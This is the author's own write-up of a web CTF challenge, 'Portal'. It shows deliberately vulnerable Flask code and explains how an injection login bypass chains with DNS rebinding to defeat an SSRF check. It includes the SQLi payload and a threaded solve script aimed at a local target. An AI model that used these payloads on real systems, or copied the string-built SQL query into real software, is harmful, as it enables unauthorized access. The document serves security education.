> For the complete documentation index, see [llms.txt](https://xenon-2.gitbook.io/writeups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://xenon-2.gitbook.io/writeups/ctf-writeups/authored-challenges/portal.md).

# Portal

## Overview

This challenge was created with the AYCEP training materials in mind and I will be going through the challenge with reference to different section of the training materials.

## Initial Analysis

We can first start with analyzing `docker-compose.yml`, which gives us a high-level overview of the challenge's network.

```yml
services:
  mysql:
    image: mariadb:10.11
    env_file: .env
    healthcheck:
      test: ["CMD-SHELL", "mariadb -u$${MYSQL_USER} -p$${MYSQL_PASSWORD} -e 'SELECT 1' || exit 1"]
      interval: 30s
      timeout: 5s
      retries: 10
      start_period: 30s
    networks:
      - backend

  app:
    build: .
    env_file: .env
    ports:
      - "3000:3000"
    dns:
      - 8.8.8.8
    depends_on:
      mysql:
        condition: service_healthy
    networks:
      - backend

networks:
  backend:
    driver: bridge
```

From this, we can notice two services, a front-facing `app` container and a `mysql` database. Notably, the `mysql` service does not expose any ports externally and is only reachable from the `internal` docker network. We can take a further look at `Dockerfile` to gain more insight into how the application is intialized.

```dockerfile
FROM python:3.11-slim

WORKDIR /app

RUN apt-get update && apt-get install -y supervisor && rm -rf /var/lib/apt/lists/*

COPY requirements.txt .
RUN pip install --no-cache-dir -r requirements.txt

COPY public/ ./public/
COPY internal/ ./internal/
COPY supervisord.conf /etc/supervisor/conf.d/supervisord.conf

RUN chmod 444 /app/internal/flag.txt

CMD ["sh", "-c", "cd /app/public && python init.py && /usr/bin/supervisord -c /etc/supervisor/conf.d/supervisord.conf"]
```

The final command is particularly interesting: instead of launching a single application, the container starts `supervisord`, suggesting that multiple processes are managed within the same container.

Looking into `supervisord.conf` confirms this suspicion. Two separate programs, `public` and `internal` are defined and automatically started when the container comes up.

```conf
[supervisord]
nodaemon=true
logfile=/var/log/supervisor/supervisord.log
pidfile=/var/run/supervisord.pid

[program:public]
command=python -u /app/public/app.py
directory=/app/public
autostart=true
autorestart=true
stdout_logfile=/dev/stdout
stdout_logfile_maxbytes=0
stderr_logfile=/dev/stderr
stderr_logfile_maxbytes=0

[program:internal]
command=python /app/internal/app.py
directory=/app/internal
autostart=true
autorestart=true
stdout_logfile=/dev/stdout
stdout_logfile_maxbytes=0
stderr_logfile=/dev/stderr
stderr_logfile_maxbytes=0
```

With that, we have identified the three main components of this challenge and can proceed to analyze the source-code.

## Source Code Analysis

Like every CTF challenge ever, we want to find where the flag is before analyzing any source-code to give a goal to head towards to. With a quick browse, we see that its located in `/internal/flag.txt` and that `/internal/app.py` displays it.

![Directory Structure](/files/oMdNZz3oZLaus1tjfA3t)

Taking a closer look at `/internal/app.py`, we note that the `internal` app has a `/flag` endpoint that displays our flag and the app is running locally on port 5000.

```python
from flask import Flask, jsonify
import os
app = Flask(__name__)


@app.route('/', methods=['GET'])
def home():
    return "Welcome to the Future! (Under Construction)"


@app.route('/flag', methods=["GET"])
def flag():
    flag_path = os.path.join(os.path.dirname(__file__), 'flag.txt')
    try:
        with open(flag_path, 'r') as f:
            flag_content = f.read().strip()
        return jsonify({"flag": flag_content})
    except Exception as e:
        return jsonify({"error": "Flag not found"}), 500


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=5000)
```

Knowing that only `public` is reachable by us, we focus our attention on `/public/*`.

{% tabs %}
{% tab title="/public/app.py" %}

```python
from flask import render_template, Flask, request, redirect, url_for, jsonify, session
from db import init_db, verify_user, add_user
from utils import validate_host, fetch_url
from functools import wraps
import secrets


app = Flask(__name__)
app.secret_key = secrets.token_hex(32)
init_db(app)


def login_required(f):
    @wraps(f)
    def decorated_function(*args, **kwargs):
        if 'username' not in session:
            return jsonify({'error': 'Unauthorized'}), 401
        return f(*args, **kwargs)
    return decorated_function

@app.route('/', methods=['GET'])
def home():
    return render_template('home.html')

@app.route('/login', methods=['GET', 'POST'])
def login():
    if request.method == 'POST':
        username = request.form['username']
        password = request.form['password']

        user = verify_user(username, password)
        if user:
            session['username'] = user.username
            session['role'] = user.role
            return redirect(url_for('dashboard'))
        else:
            return render_template('login.html', error='Invalid credentials')
    return render_template('login.html')


@app.route('/register', methods=['GET', 'POST'])
def register():
    if request.method == 'POST':
        username = request.form['username']
        password = request.form['password']

        try:
            add_user(username, password)
            return redirect(url_for('login'))
        except Exception:
            return render_template('register.html', error='Username already exists')
    return render_template('register.html')


@app.route('/logout', methods=['POST'])
def logout():
    session.clear()
    return redirect(url_for('home'))


@app.route('/dashboard', methods=['GET', 'POST'])
@login_required
def dashboard():
    content = None
    if request.method == 'POST' and session.get('role') == 'admin':
        url = request.form.get('target_url', '')

        is_valid, result = validate_host(url)
        if not is_valid:
            content = result
        else:
            try:
                response = fetch_url(result)
                content = response.text
            except Exception:
                content = "Failed to fetch URL"

    return render_template('dashboard.html', username=session.get('username'), role=session.get('role'), content=content)


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=3000)
```

{% endtab %}

{% tab title="/public/db.py" %}

```python
from flask_sqlalchemy import SQLAlchemy
import os

db = SQLAlchemy()


class User(db.Model):
    __tablename__ = 'users'
    id = db.Column(db.Integer, primary_key=True, autoincrement=True)
    username = db.Column(db.String(80), unique=True, nullable=False)
    password = db.Column(db.String(200), nullable=False)
    role = db.Column(db.String(20), default='user')


def init_db(app):
    user = os.environ.get('MYSQL_USER')
    password = os.environ.get('MYSQL_PASSWORD')
    host = os.environ.get('MYSQL_HOST')
    database = os.environ.get('MYSQL_DATABASE')
    app.config['SQLALCHEMY_DATABASE_URI'] = f'mysql+pymysql://{user}:{password}@{host}/{database}'
    app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
    app.config['SQLALCHEMY_POOL_RECYCLE'] = 299
    app.config['SQLALCHEMY_POOL_TIMEOUT'] = 20
    db.init_app(app)


def create_tables(app):
    with app.app_context():
        db.create_all()
        db.session.commit()


def add_user(username, password, role='user'):
    user = User(username=username, password=password, role=role)
    db.session.add(user)
    db.session.commit()
    return user


def get_user_by_username(username):
    return User.query.filter_by(username=username).first()


def verify_user(username, password):
    query = f"SELECT username, role FROM users WHERE username = '{username}' AND password = '{password}'"
    try:
        result = db.session.execute(db.text(query))
        row = result.fetchone()
        if row:
            return get_user_by_username(username)
        return None
    except Exception:
        db.session.rollback()
        return None

```

{% endtab %}

{% tab title="/public/init.py" %}

```python
from flask import Flask
from db import init_db, create_tables, add_user
import secrets
if __name__ == '__main__':
    app = Flask(__name__)
    init_db(app)

    with app.app_context():
        create_tables(app)
        add_user('admin', secrets.token_hex(16), role='admin')
        print("Database initialized successfully!")
```

{% endtab %}

{% tab title="/public/utils.py" %}

```python
import socket
import ipaddress
import requests
from urllib3.util import parse_url


def validate_host(url):
    """Check if URL's host resolves to a non-private IP"""
    parsed = parse_url(url)
    host = parsed.hostname

    if not host or parsed.scheme not in ('http', 'https'):
        return False, 'Invalid URL'

    try:
        ip = socket.gethostbyname(host)
    except socket.gaierror:
        return False, 'Could not resolve host'

    ip_obj = ipaddress.ip_address(ip)
    if ip_obj.is_loopback or ip_obj.is_private or ip_obj.is_reserved or ip_obj.is_link_local:
        return False, 'Host resolves to a private or restricted IP'

    return True, parsed


def fetch_url(url):
    res = requests.get(url,timeout=5, allow_redirects=False)
    return res
```

{% endtab %}
{% endtabs %}

We start by identifying sources and sinks. Starting with `/public/app.py`, we identify the following sources.

* `/login`
  * `request.form['username']`
  * `request.form['password']`
* `/register`
  * `request.form['username']`
  * `request.form['password']`
* `/dashboard`
  * `request.form.get('target_url', '')`
    * Requires `session.get('role') == 'admin'`

Now that we have identified all the sources, it's time to identify whether these sources go through any form of **transformation/validation**.

For `/login` and `/register`, it passes user-supplied input to database helper functions, `verify_user` and `add_user` respectively located in `db.py`

Reviewing the said functions, we observe a difference in how user-input is handled. The `add_user` function uses SQLAlchemy’s ORM to create a `User` object and insert it into the database.

```python
user = User(username=username, password=password, role=role)
```

SQLAlchemy's ORM automatically parameterizes queries which is one of the fixes covered that mitigates SQLi.

However, `verify_user` takes a different approach.

```python
query = f"SELECT username, role FROM users WHERE username = '{username}' AND password = '{password}'"
```

Here, user-controlled input is directly concatenated into a SQL query using string formatting. This makes it vulnerable to SQLi!

This gives us a vulnerable sink from `/login` to `verify_user`.

Let's continue exploring `/dashboard` app route for now.

```python
<snip>
if request.method == 'POST' and session.get('role') == 'admin':
    url = request.form.get('target_url', '')

    is_valid, result = validate_host(url)
    if not is_valid:
        content = result
    else:
        try:
            response = fetch_url(result)
            content = response.text
        except Exception:
            content = "Failed to fetch URL"

return render_template('dashboard.html', username=session.get('username'), role=session.get('role'), content=content)
```

Ignoring the admin role check for the time being, we see that it first validates our `target_url` with `validate_host` before passing it to `fetch_url` before displaying the response.

Taking a look at `/public/utils.py`, we can see the implementation of `validate_host` and `fetch_url` in-depth.

```python
import socket
import ipaddress
import requests
from urllib3.util import parse_url


def validate_host(url):
    """Check if URL's host resolves to a non-private IP"""
    parsed = parse_url(url)
    host = parsed.hostname

    if not host or parsed.scheme not in ('http', 'https'):
        return False, 'Invalid URL'

    try:
        ip = socket.gethostbyname(host)
    except socket.gaierror:
        return False, 'Could not resolve host'

    ip_obj = ipaddress.ip_address(ip)
    if ip_obj.is_loopback or ip_obj.is_private or ip_obj.is_reserved or ip_obj.is_link_local:
        return False, 'Host resolves to a private or restricted IP'

    return True, parsed


def fetch_url(url):
    res = requests.get(url,timeout=5, allow_redirects=False)
    return res
```

From a glance we see that it does the following checks

1. Checks URL scheme to ensure it is `http` or `https`
2. Performs a DNS lookup with `socket.gethostbyname`
3. Enforces a IP blacklist
   1. Loopback - 127.0.0.1
   2. Private IPs - (10.x, 192.168.x.x etc)
   3. Reserved Ranges
   4. Link-Local
4. Returns parsed which is subsequently fetched with `requests.get`

This seems to prevent SSRF as after all, we are not able to bypass the DNS lookup to localhost right?

This brings us to DNS-Rebinding, a variation of SSRF.

![DNS-Rebinding Diagram](/files/h2DzqeNgsz8kKCmDVu3S)

Essentially, the main point here is that `requests.get` performs its own independent [DNS Resolution](https://stackoverflow.com/questions/36087637/how-often-does-python-requests-perform-dns-queries).

An attacker can exploit this gap by serving a public IP to pass the initial DNS lookup `socket.gethostbyname(host)`, then rapidly swapping to an internal IP for the request.

You can read about the vulnerability in detail [over here](https://swisskyrepo.github.io/PayloadsAllTheThings/DNS%20Rebinding/)

This gives us our last vulnerable sink from `/dashboard` to `fetch_url`.

Now, let's combine the pieces for exploitation.

## Exploitation

Based on the Dockerfile earlier, we know that it executes `init.py` which we now see creates the required tables and adds a **admin user** into the database.

```python
add_user('admin', secrets.token_hex(16), role='admin')
```

We can thus craft a SQLi query with the goal of logging in as **admin**

```sql
SELECT username, role FROM users
WHERE username = 'admin' AND password = '' OR '1'='1'
```

Since the expression `'1'='1'` always evaluates to TRUE, the `WHERE` clause becomes TRUE, allowing `row` to return a valid result.

The username has to be `admin` as `get_user_by_username` uses it to retrieve user information later in the function.

This brings us to `/dashboard`.

![Success!](/files/ux9DUIguavv74ei4fhL8)

Now that we are admin, we can use the URL scanner functionality which we previously identified is vulnerable to a DNS-Rebinding attack.

We can use the tool [rbndr](https://lock.cmpxchg8b.com/rebinder.html) which generates a hostname which switches between two IP addresses randomly.

![rbndr](/files/hswnCBths17PFagfqwAq)

We also have to add the port 5000 and `/flag` as we want to reach the internal app's flag endpoint.

Eventually, the DNS resolution swapped at the exact moment necessary to bypass the check, allowing us to capture the flag.

![Success!](/files/6DPDe3f2VpZ8gHqmZvLB)

I also automated it with a solve script to make things easier.

```python
"""
1. SQLi auth bypass to get admin access
2. Login as admin to access URL scanner
3. Use DNS rebinding to bypass SSRF protection and access internal service
"""

import requests
import time
import threading

BASE_URL = 'http://localhost:31004'
REBINDER_URL = 'http://08080808.7f000001.rbndr.us:5000/flag'



def ssrf_rebind(max_time=60):
    session = requests.Session()
    resp = session.post(BASE_URL + '/login', data={'username': 'admin', 'password': "' OR '1'='1"})
    if 'dashboard' not in resp.url and 'Dashboard' not in resp.text:
        return None

    result = {'flag': None}
    end = time.time() + max_time
    
    def worker():
        while time.time() < end and not result['flag']:
            try:
                r = session.post(BASE_URL + '/dashboard', data={'target_url': REBINDER_URL}, timeout=10)
                if 'grey{' in r.text.lower():
                    result['flag'] = r.text
                    return
            except Exception:
                pass
            time.sleep(0.05)
    
    threads = [threading.Thread(target=worker) for _ in range(10)]
    for t in threads:
        t.start()
    for t in threads:
        t.join(timeout=max_time)
    
    return result['flag']


if __name__ == '__main__':
    flag = ssrf_rebind()
    if flag:
        print(flag)
```

## Reflection

With this being AYCEP Finals, I wanted to provide participants a challenge with a variation of an attack that was not covered during training.

This writeup serves as a more structured process of approaching web ctf challenges. As codebases get larger, having the right approach will save you lots of time especially if augmented with LLMs.

Thanks for reading!


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://xenon-2.gitbook.io/writeups/ctf-writeups/authored-challenges/portal.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
